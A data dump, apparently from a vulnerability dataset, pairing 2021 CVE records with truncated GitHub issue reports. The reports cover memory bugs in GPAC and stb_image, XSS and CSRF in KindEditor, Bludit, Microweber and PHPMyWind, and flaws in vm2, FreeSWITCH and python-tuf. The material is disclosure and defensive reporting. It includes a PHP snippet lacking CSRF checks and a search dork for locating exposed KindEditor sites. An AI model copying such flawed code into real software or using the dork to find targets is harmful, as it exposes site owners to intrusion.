"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1346"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/1346 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough informa... | Segmentation fault (ASAN: SEGV on unknown address) in the FixTrackID function of isom_intern.c:133 | https://api.github.com/repos/gpac/gpac/issues/1346/comments | 1 | 2019-11-13T07:15:54Z | 2020-01-09T18:00:04Z | https://github.com/gpac/gpac/issues/1346 | 522,006,717 | 1,346 | 2,695 |
CVE-2020-22675 | 2021-10-12T21:15:07.457 | An issue was discovered in gpac 0.8.0. The GetGhostNum function in stbl_read.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1344"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1344 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough informa... | There is a heap-buffer-overflow in the GetGhostNum function of stbl_read.c:369 | https://api.github.com/repos/gpac/gpac/issues/1344/comments | 1 | 2019-11-13T05:18:43Z | 2020-01-09T17:59:57Z | https://github.com/gpac/gpac/issues/1344 | 521,966,021 | 1,344 | 2,696 |
CVE-2020-22677 | 2021-10-12T21:15:07.497 | An issue was discovered in gpac 0.8.0. The dump_data_hex function in box_dump.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1341 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough informa... | There is a heap-buffer-overflow in the dump_data_hex function of box_dump.c:51 | https://api.github.com/repos/gpac/gpac/issues/1341/comments | 1 | 2019-11-13T03:49:59Z | 2020-01-09T17:59:47Z | https://github.com/gpac/gpac/issues/1341 | 521,942,076 | 1,341 | 2,697 |
CVE-2020-22678 | 2021-10-12T21:15:07.540 | An issue was discovered in gpac 0.8.0. The gf_media_nalu_remove_emulation_bytes function in av_parsers.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1339"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1339 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
- [ √] I looked for a similar issue and couldn't find any.
- [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
- [ √] I give enough i... | There is a heap-buffer-overflow in the gf_media_nalu_remove_emulation_bytes function of av_parsers.c:4722 | https://api.github.com/repos/gpac/gpac/issues/1339/comments | 1 | 2019-11-13T03:14:38Z | 2020-01-09T17:59:39Z | https://github.com/gpac/gpac/issues/1339 | 521,931,348 | 1,339 | 2,698 |
CVE-2020-22679 | 2021-10-12T21:15:07.580 | Memory leak in the sgpd_parse_entry function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1345"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": ... | [
"401"
] | 401 | https://github.com/gpac/gpac/issues/1345 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough informa... | There are memory leaks in the sgpd_parse_entry function of box_code_base.c:9656 | https://api.github.com/repos/gpac/gpac/issues/1345/comments | 1 | 2019-11-13T05:25:14Z | 2020-01-09T18:00:00Z | https://github.com/gpac/gpac/issues/1345 | 521,967,985 | 1,345 | 2,699 |
CVE-2020-19964 | 2021-10-14T15:15:08.767 | A Cross Site Request Forgery (CSRF) vulnerability was discovered in PHPMyWind 5.6 which allows attackers to create a new administrator account without authentication. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://phpmywind.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Third Party Advisory"
],
"url": "https://github.com/gaozhifeng/PHPMyWind"
},
{
"source": "cve@mitre.org",
"tag... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:phpmywind:phpmywind:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "7B3A030C-77BA-4095-9EFC-7B1109E570CB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | [
"352"
] | 352 | https://github.com/gaozhifeng/PHPMyWind/issues/9 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gaozhifeng",
"PHPMyWind"
] |
Product Homepage: http://phpmywind.com/
Software link: https://github.com/gaozhifeng/PHPMyWind
Version: v5.6
The backend code writes the new user data to the database without authentication such as token
```php
if($dosql->GetOne("SELECT `id` FROM `$tbname` WHERE `username`='$username'"))
{
ShowMs... | CSRF vulnerability exists in PHPMyWind v5.6 | https://api.github.com/repos/gaozhifeng/PHPMyWind/issues/9/comments | 0 | 2019-10-28T06:19:09Z | 2019-10-28T06:19:09Z | https://github.com/gaozhifeng/PHPMyWind/issues/9 | 513,117,647 | 9 | 2,700 |
CVE-2021-42227 | 2021-10-14T17:15:08.787 | Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via a Google search inurl:/examples/uploadbutton.html and then the .html file on the website that uses this editor (the file suffix is allowed). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kindsoft/kindeditor/issues/336"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kindsoft:kindeditor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "144DBADD-4B45-42B6-AFD7-435C62A9BC18",
"versionEndExcluding": null,
"versionEndIncluding": "4.1.12",
"versionStartEx... | [
"79"
] | 79 | https://github.com/kindsoft/kindeditor/issues/336 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kindsoft",
"kindeditor"
] |
> [Suggested description]
> Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via
> a Google search inurl:/examples/uploadbutton.html and then the .html
> file on the website that uses this editor (the file suffix is allowed).
>
> ------------------------------------------
>
> [Vulnerability ... | There is a stored xss vulnerability in kindeditor - 4.1.* | https://api.github.com/repos/kindsoft/kindeditor/issues/336/comments | 0 | 2021-10-14T06:26:59Z | 2021-10-14T06:26:59Z | https://github.com/kindsoft/kindeditor/issues/336 | 1,026,009,823 | 336 | 2,701 |
CVE-2021-42228 | 2021-10-14T17:15:08.830 | A Cross Site Request Forgery (CSRF) vulnerability exists in KindEditor 4.1.x, as demonstrated by examples/uploadbutton.html. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/kindsoft/kindeditor/issues/337"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://git... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kindsoft:kindeditor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "144DBADD-4B45-42B6-AFD7-435C62A9BC18",
"versionEndExcluding": null,
"versionEndIncluding": "4.1.12",
"versionStartEx... | [
"352"
] | 352 | https://github.com/kindsoft/kindeditor/issues/337 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"kindsoft",
"kindeditor"
] | > [Suggested description]
> Cross Site Request Forgery (CSRF) vulnerability exists in KindEdirot
> 4.1.x. First, you upload an html file containing csrf on the website
> that uses a google editor, (you only need to search in google:
> inurl:/examples/uploadbutton.html) and then use the authority of this
> website ... | There is a csrf vulnerability in kindeditor - 4.1.* | https://api.github.com/repos/kindsoft/kindeditor/issues/337/comments | 0 | 2021-10-14T06:34:58Z | 2021-10-14T06:34:58Z | https://github.com/kindsoft/kindeditor/issues/337 | 1,026,015,699 | 337 | 2,702 |
CVE-2021-28021 | 2021-10-15T16:15:07.340 | Buffer overflow vulnerability in function stbi__extend_receive in stb_image.h in stb 2.26 via a crafted JPEG file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1108"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stb_project:stb:2.26:*:*:*:*:*:*:*",
"matchCriteriaId": "FF2E3EE0-725E-48D0-A6A0-F82409594F61",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"787"
] | 787 | https://github.com/nothings/stb/issues/1108 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | heap overflow by a craft jpeg file in stb_image.h:2099
poc [poc_hoob.zip](https://github.com/nothings/stb/files/6082734/poc_hoob.zip)
asan report:
```
==42271==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000559f20 at pc 0x00000051a2dd bp 0x7ffd06a9e900 sp 0x7ffd06a9e8f8
READ of size 4 at 0x0... | heap overflow in stb_image.h:2099 | https://api.github.com/repos/nothings/stb/issues/1108/comments | 2 | 2021-03-04T10:19:50Z | 2021-10-15T01:45:27Z | https://github.com/nothings/stb/issues/1108 | 821,985,137 | 1,108 | 2,703 |
CVE-2021-23449 | 2021-10-18T17:15:07.790 | This affects the package vm2 before 3.9.4 via a Prototype Pollution attack vector, which can lead to execution of arbitrary code on the host machine. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "22C0E167-6242-41C5-9937-A435AE42AD3E",
"versionEndExcluding": "3.9.4",
"versionEndIncluding": null,
"versionStartE... | [
"1321"
] | 1321 | https://github.com/patriksimek/vm2/issues/363 | [
"Third Party Advisory"
] | github.com | [
"patriksimek",
"vm2"
] | Hi,
I would like to report a sandbox breakout, but I believe this should be done in a responsible, private way. Please create a security policy and an advisory, as instructed here: https://github.com/patriksimek/vm2/issues/338 | Sandbox breakout | https://api.github.com/repos/patriksimek/vm2/issues/363/comments | 4 | 2021-09-07T09:20:16Z | 2021-10-15T23:01:08Z | https://github.com/patriksimek/vm2/issues/363 | 989,776,033 | 363 | 2,704 |
CVE-2021-36513 | 2021-10-18T17:15:07.913 | An issue was discovered in function sofia_handle_sip_i_notify in sofia.c in SignalWire freeswitch before 1.10.6, may allow attackers to view sensitive information due to an uninitialized value. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/signalwire/freeswitch/issues/1245"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/signal... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:signalwire:freeswitch:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82B8B23B-0388-4427-BF92-059D8573DC7F",
"versionEndExcluding": "1.10.6",
"versionEndIncluding": null,
"versionStart... | [
"909"
] | 909 | https://github.com/signalwire/freeswitch/issues/1245 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"signalwire",
"freeswitch"
] | There are a few uninitialized value use bugs in src/mode/endpoints/mod_sofia/sofia.c
In function sofia_handle_sip_i_notify():
Array network_ip will be allocated in line 859
```
857 if (sofia_test_pflag(profile, PFLAG_FORWARD_MWI_NOTIFY)) {
858 const char *mwi_status = NUL... | Usage-of-uninitialized value | https://api.github.com/repos/signalwire/freeswitch/issues/1245/comments | 3 | 2021-06-29T23:15:58Z | 2021-07-24T19:40:41Z | https://github.com/signalwire/freeswitch/issues/1245 | 933,172,641 | 1,245 | 2,705 |
CVE-2021-33988 | 2021-10-19T17:15:07.107 | Cross Site Scripting (XSS). vulnerability exists in Microweber CMS 1.2.7 via the Login form, which could let a malicious user execute Javascript by Inserting code in the request form. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nck0099/osTicket/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.c... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microweber:microweber:1.2.7:*:*:*:*:*:*:*",
"matchCriteriaId": "93BB666C-22D1-42FB-B091-2C13141D4F64",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/nck0099/osTicket/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"nck0099",
"osTicket"
] | **Microweber Reflected XSS**
**Vuln Description:**
_Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables exe... | Microweber CMS(1.2.7) Reflected XSS | https://api.github.com/repos/nck0099/osTicket/issues/2/comments | 1 | 2021-05-23T18:49:14Z | 2021-10-27T08:11:24Z | https://github.com/nck0099/osTicket/issues/2 | 899,083,420 | 2 | 2,706 |
CVE-2021-35323 | 2021-10-19T18:15:07.920 | Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/164990/Bludit-3.13.1-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*",
"matchCriteriaId": "2073F4B1-16F9-491D-A54E-5A1CBE9ED6F7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"79"
] | 79 | https://github.com/bludit/bludit/issues/1327 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"bludit",
"bludit"
] | ### Describe your problem
I found a cross-site scripting attack on the login page http://localhost:800/admin/login
cross-site scripting is a vulnerability that allows an attacker to send malicious code(usually in javascript form)
to another user
Because a browser cannot know if the script should be trusted or not,
... | cross site script (xss) | https://api.github.com/repos/bludit/bludit/issues/1327/comments | 4 | 2021-05-27T17:35:01Z | 2021-11-15T03:15:38Z | https://github.com/bludit/bludit/issues/1327 | 904,020,030 | 1,327 | 2,707 |
CVE-2021-41131 | 2021-10-19T18:15:07.967 | python-tuf is a Python reference implementation of The Update Framework (TUF). In both clients (`tuf/client` and `tuf/ngclient`), there is a path traversal vulnerability that in the worst case can overwrite files ending in `.json` anywhere on the client system on a call to `get_one_valid_targetinfo()`. It occurs becaus... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.8,
"confidentialityImpact": "NONE"... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Trackin... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxfoundation:the_update_framework:*:*:*:*:*:python:*:*",
"matchCriteriaId": "6F0BDA96-F4FA-4C50-904E-56E5E3BE4B13",
"versionEndExcluding": null,
"versionEndIncluding": "0.18.1",
... | [
"22"
] | 22 | https://github.com/theupdateframework/python-tuf/issues/1527 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"theupdateframework",
"python-tuf"
] | **Description of issue or feature request**:
Delegation role names are not restricted in any way in the spec, but they are targets metadata role names.
They could be `"."`, `"../../filename"` or `1.role`.
The problem is that at some point those delegation role names are used when constructing an URL used
to downloa... | Metadata API: Delegation role names validation | https://api.github.com/repos/theupdateframework/python-tuf/issues/1527/comments | 15 | 2021-08-20T18:14:23Z | 2021-11-18T08:56:52Z | https://github.com/theupdateframework/python-tuf/issues/1527 | 975,822,427 | 1,527 | 2,708 |
CVE-2021-41167 | 2021-10-20T19:15:07.570 | modern-async is an open source JavaScript tooling library for asynchronous operations using async/await and promises. In affected versions a bug affecting two of the functions in this library: forEachSeries and forEachLimit. They should limit the concurrency of some actions but, in practice, they don't. Any code callin... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"I... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:modern-async_project:modern-async:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "8342CAB0-7958-4083-BFBE-643DDB7E9E2A",
"versionEndExcluding": "1.0.4",
"versionEndIncluding": null,
... | [
"770"
] | 770 | https://github.com/nicolas-van/modern-async/issues/5 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"nicolas-van",
"modern-async"
] | See this Code:
```js
//@ts-ignore
var {forEachLimit}=require('modern-async')
var ar=[]
for(let i=0;i<=100;i++) ar.push(i)
forEachLimit(ar,async item=>{
await delay(1000)
console.log(item)
},5)
function delay(ms){return new Promise(resolve=>setTimeout(resolve,ms))}
```
It should show every 1 seco... | forEachLimit is ignoring the concurrent paramter | https://api.github.com/repos/nicolas-van/modern-async/issues/5/comments | 1 | 2021-10-20T05:17:12Z | 2021-10-26T07:49:53Z | https://github.com/nicolas-van/modern-async/issues/5 | 1,030,984,396 | 5 | 2,709 |
CVE-2021-42715 | 2021-10-21T19:15:08.017 | An issue was discovered in stb stb_image.h 1.33 through 2.27. The HDR loader parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting crafted HDR files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1224"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nothings:stb_image.h:*:*:*:*:*:*:*:*",
"matchCriteriaId": "999F1FA2-C650-44D5-84C5-444967092386",
"versionEndExcluding": null,
"versionEndIncluding": "2.27",
"versionStartExc... | [
"835"
] | 835 | https://github.com/nothings/stb/issues/1224 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | **Summary**
stb_image's HDR loader in versions 1.33 to and including v2.27 parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting specially constructed HDR files.
CVE number: [C... | In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder | https://api.github.com/repos/nothings/stb/issues/1224/comments | 4 | 2021-10-07T20:06:19Z | 2023-01-29T23:48:43Z | https://github.com/nothings/stb/issues/1224 | 1,020,414,414 | 1,224 | 2,710 |
CVE-2021-42716 | 2021-10-21T19:15:08.083 | An issue was discovered in stb stb_image.h 2.27. The PNM loader incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to a buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1166"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*",
"matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | [
"120"
] | 120 | https://github.com/nothings/stb/issues/1166 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | i find a heap-buffer-overflow(oob read)
[poc.zip](https://github.com/nothings/stb/files/6815470/poc.zip)
in stbi__pnm_load, if req_comp && req_comp != s->img_n, the will call stbi__convert_format, But it does not multiply ri->bits_per_channel / 8, 0 ,if ri.bits_per_channel != 8, will call stbi__convert_16_to_8, an... | stbi__pnm_load heap-buffer-overflow bug | https://api.github.com/repos/nothings/stb/issues/1166/comments | 3 | 2021-07-14T10:52:47Z | 2023-01-29T23:48:49Z | https://github.com/nothings/stb/issues/1166 | 944,299,089 | 1,166 | 2,711 |
CVE-2021-42716 | 2021-10-21T19:15:08.083 | An issue was discovered in stb stb_image.h 2.27. The PNM loader incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to a buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes ... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1166"
},
{
"source": "cve@mitre.org",
"tags": [
